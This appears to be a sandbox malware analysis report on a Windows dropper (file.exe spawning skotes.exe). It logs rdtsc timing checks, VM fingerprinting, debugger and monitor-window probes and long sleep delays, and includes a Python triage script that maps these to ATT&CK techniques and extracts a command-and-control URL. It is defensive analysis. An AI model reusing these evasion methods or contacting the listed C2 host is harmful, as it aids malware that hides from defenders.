                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0101 second address: 4EA0172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FD0F8CDABEEh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FD0F8CDABEDh 0x0000001a and al, 00000036h 0x0000001d jmp 00007FD0F8CDABF1h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007FD0F8CDABF0h 0x00000029 or ecx, 07E63F58h 0x0000002f jmp 00007FD0F8CDABEBh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0172 second address: 4EA018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA018A second address: 4EA018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1042B second address: 4F10465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8E1A7B8h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10465 second address: 4F10469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10469 second address: 4F1046F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1046F second address: 4F104BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD0F8CDABF5h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FD0F8CDABECh 0x00000019 sub cx, 7B58h 0x0000001e jmp 00007FD0F8CDABEBh 0x00000023 popfd 0x00000024 mov edi, esi 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov si, dx 0x0000002f mov cl, bl 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104BE second address: 4F104FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD0F8E1A7ABh 0x00000009 jmp 00007FD0F8E1A7B3h 0x0000000e popfd 0x0000000f mov dx, si 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD0F8E1A7ACh 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104FA second address: 4F10509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10509 second address: 4F10521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10521 second address: 4F1054C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0F8CDABF5h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105CA second address: 4F105D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105D0 second address: 4F105E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 push esi 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105E3 second address: 4F105E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105E9 second address: 4F105ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F105ED second address: 4F105F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F105F1 second address: 4F10600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F10600 second address: 4F10604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F10604 second address: 4F10608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F10608 second address: 4F1060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4F1060E second address: 4F10614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB057A second address: 4EB0594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB0594 second address: 4EB05AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB05AF second address: 4EB05B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB05B4 second address: 4EB05DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD0F8CDABF6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB05DA second address: 4EB05E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB05E0 second address: 4EB05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB05E6 second address: 4EB05EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB05EA second address: 4EB0606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD0F8CDABEEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB0606 second address: 4EB060C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB060C second address: 4EB0630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FD0F8CDABE9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 movsx ebx, ax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB0738 second address: 4EB073E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB073E second address: 4EB075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB075B second address: 4EB07C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000000h] 0x0000000e jmp 00007FD0F8E1A7ADh 0x00000013 nop 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FD0F8E1A7ACh 0x0000001b and ch, 00000058h 0x0000001e jmp 00007FD0F8E1A7ABh 0x00000023 popfd 0x00000024 mov ah, 1Ah 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FD0F8E1A7B0h 0x0000002f sbb ecx, 6F439FB8h 0x00000035 jmp 00007FD0F8E1A7ABh 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d mov ax, 8185h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EB07C2 second address: 4EB0821 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD0F8CDABF2h 0x00000008 sbb cx, 5A18h 0x0000000d jmp 00007FD0F8CDABEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007FD0F8CDABF6h 0x0000001c sub esp, 1Ch 0x0000001f pushad 0x00000020 jmp 00007FD0F8CDABEEh 0x00000025 push eax 0x00000026 mov si, bx 0x00000029 pop edx 0x0000002a popad 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov ah, 56h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 73579F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 796594 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: 96579F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: 9C6594 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc (display adapter class; VM video driver fingerprint)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04F10566 rdtsc 0_2_04F10566
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 180000 ms
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window / User API: threadDelayed 1216
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window / User API: threadDelayed 472
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window / User API: threadDelayed 1208
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window / User API: threadDelayed 1215
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8124 | Thread sleep count: 1216 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8124 | Thread sleep time: -2433216 ms >= -30000 ms
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080 | Thread sleep count: 472 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080 | Thread sleep time: -14160000 ms >= -30000 ms
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8120 | Thread sleep count: 1208 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8120 | Thread sleep time: -2417208 ms >= -30000 ms
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7176 | Thread sleep time: -360000 ms >= -30000 ms
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8112 | Thread sleep count: 1215 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8112 | Thread sleep time: -2431215 ms >= -30000 ms
Source: C:\Users\user\Desktop\file.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 30000 ms
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 180000 ms
Source: skotes.exe, skotes.exe, 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1433845243.00000000011B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.2657383555.0000000000D28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1463759755.00000000006EE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1497859902.000000000091E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1507190175.000000000091E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                    Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: NTICE (SoftICE driver device name)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: SICE (SoftICE driver device name)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File opened: SIWVID (SoftICE driver device name)
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort (9 occurrences)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04F10566 rdtsc 0_2_04F10566
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_0075652B mov eax, dword ptr fs:[00000030h] (PEB read) 5_2_0075652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_0075A302 mov eax, dword ptr fs:[00000030h] (PEB read) 5_2_0075A302
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: skotes.exe | Binary or memory string: h!Program Manager
Source: file.exe, 00000000.00000002.1463759755.00000000006EE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1497859902.000000000091E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1507190175.000000000091E000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: h!Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_0073D3E2 cpuid 5_2_0073D3E2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_0073CBEA GetSystemTimePreciseAsFileTime, GetSystemTimePreciseAsFileTime, 5_2_0073CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 5_2_007265E0 LookupAccountNameA, 5_2_007265E0
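The sandbox-evasion and anti-debugging entries above are raw interceptor output: window-name probes, SoftICE device opens, DebugPort queries, ThreadHideFromDebugger, VM registry fingerprinting, back-to-back rdtsc, long Sleep calls, and the C2 URL carved from memory. The script below is an added triage example and is not part of the Joe Sandbox report or product. It maps each kind of line to the Windows API or instruction the behaviour implies and to the ATT&CK technique it supports, totals the requested Sleep time, and pulls the C2 host and path out of the URL strings. The regexes, the API annotations and the technique mapping are the editor's own assumptions; the sample lines are constructed from entries in this report.

```python
"""Map Joe Sandbox behaviour lines to the anti-analysis technique they imply.

Added example, not part of the Joe Sandbox report or product. Rules, API
annotations and the ATT&CK mapping are assumptions made for this example.
"""
import re
from collections import Counter, defaultdict

# One regex per behaviour family; named groups feed the detail template.
# T1622 Debugger Evasion, T1497.001 Sandbox Evasion: System Checks,
# T1497.003 Sandbox Evasion: Time Based Evasion.
RULES = [
    (r"Open window title or class name: (?P<v>.+)$",
     "T1622", "FindWindow/EnumWindows probe for analysis-tool window '{v}'"),
    (r"File opened: (?P<v>NTICE|SICE|SIWVID)$",
     "T1622", "CreateFile on SoftICE device \\\\.\\{v}"),
    (r"Process queried: DebugPort",
     "T1622", "NtQueryInformationProcess(ProcessDebugPort=7)"),
    (r"Thread information set: HideFromDebugger",
     "T1622", "NtSetInformationThread(ThreadHideFromDebugger=0x11)"),
    (r"mov eax, dword ptr fs:\[00000030h\]",
     "T1622", "PEB read via fs:[0x30] (BeingDebugged +0x02, NtGlobalFlag +0x68)"),
    (r"RDTSC instruction interceptor",
     "T1497.003", "back-to-back rdtsc delta check"),
    (r"Thread delayed: delay time: (?P<v>\d+)",
     "T1497.003", "Sleep({v} ms)"),
    (r"Registry key queried: (?P<k>\S+) name: (?P<v>DriverDesc|SystemBiosVersion|VideoBiosVersion)",
     "T1497.001", "RegQueryValueEx {k}\\{v} (VM/hypervisor fingerprint)"),
    (r"Binary or memory string: .*(?:VBOX__|VMware|Hyper-V)",
     "T1497.001", "embedded VM vendor string"),
    (r"\bcpuid\b",
     "T1497.001", "cpuid hypervisor-present bit / vendor leaf"),
]
COMPILED = [(re.compile(rx), tid, tmpl) for rx, tid, tmpl in RULES]
# Host plus path up to .php; anything after .php is string-carving overread.
URL_RE = re.compile(r"https?://(?P<host>[\w.-]+)(?P<path>/[\w./-]*?\.php)?")


def triage(lines):
    """Return (technique counts, findings, total Sleep ms, {c2 host: paths})."""
    counts, findings, sleep_ms = Counter(), [], 0
    c2 = defaultdict(set)
    for raw in lines:
        line = raw.strip()
        u = URL_RE.search(line)
        if u:
            c2[u.group("host")].add(u.group("path") or "/")
        for rx, tid, tmpl in COMPILED:
            m = rx.search(line)
            if m:
                counts[tid] += 1
                findings.append((tid, tmpl.format(**m.groupdict())))
                if tmpl.startswith("Sleep("):
                    sleep_ms += int(m.group("v"))
                break  # first matching rule wins
    return counts, findings, sleep_ms, dict(c2)


def summarize(lines):
    """Human-readable summary of a batch of report lines."""
    counts, findings, sleep_ms, c2 = triage(lines)
    out = [f"{tid}: {n} line(s)" for tid, n in sorted(counts.items())]
    out.append(f"total Sleep requested: {sleep_ms} ms ({sleep_ms / 60000:.1f} min)")
    for host, paths in sorted(c2.items()):
        out.append(f"C2 {host} paths: {', '.join(sorted(paths))}")
    out.extend(f"  {tid} {detail}" for tid, detail in findings)
    return "\n".join(out)


# Constructed sample: entries copied from this report, one behaviour per line.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F105ED second address: 4F105F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000",
    r"Source: skotes.exe, 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__",
    r"Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE",
    r"Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0075652B mov eax, dword ptr fs:[00000030h] 5_2_0075652B",
    r"Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0073D3E2 cpuid 5_2_0073D3E2",
    r"http://185.215.113.43/Zu7JuNko/index.phpncodedH skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmp false",
    r"http://185.215.113.43/8 skotes.exe, 00000005.00000002.2657383555.0000000000D28000.00000004.00000020.00020000.00000000.sdmp false",
]

if __name__ == "__main__":
    print(summarize(SAMPLE_LINES))
```

Feed it the full behaviour section of a report and the per-technique counts give a quick sense of how much of the sample's activity is anti-analysis versus payload; the Sleep total is what an analyst needs in order to decide whether the sandbox timeout (here 6m 47s with a 3-minute delay loop) was long enough for the sample to reach its C2 phase.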

                    Stealing of Sensitive Information

Source: Yara match | File source: 3.2.skotes.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.skotes.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.skotes.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1497759494.0000000000721000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1423354567.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1466497850.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.1457117559.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1507039683.0000000000721000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.1611788887.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1463607272.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
MITRE ATT&CK Matrix

One line per tactic, techniques in the matrix's column order. A number in parentheses is the figure the matrix shows against that technique (i.e. it was matched by this analysis); techniques without a number are the matrix's unmatched placeholders.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Scheduled Task/Job (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Process Injection (12); Scheduled Task/Job (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (251); Process Injection (12); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1); Compile After Delivery; Indicator Removal from Tools; HTML Smuggling
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (1); Security Software Discovery (741); Process Discovery (2); Virtualization/Sandbox Evasion (251); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (224)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
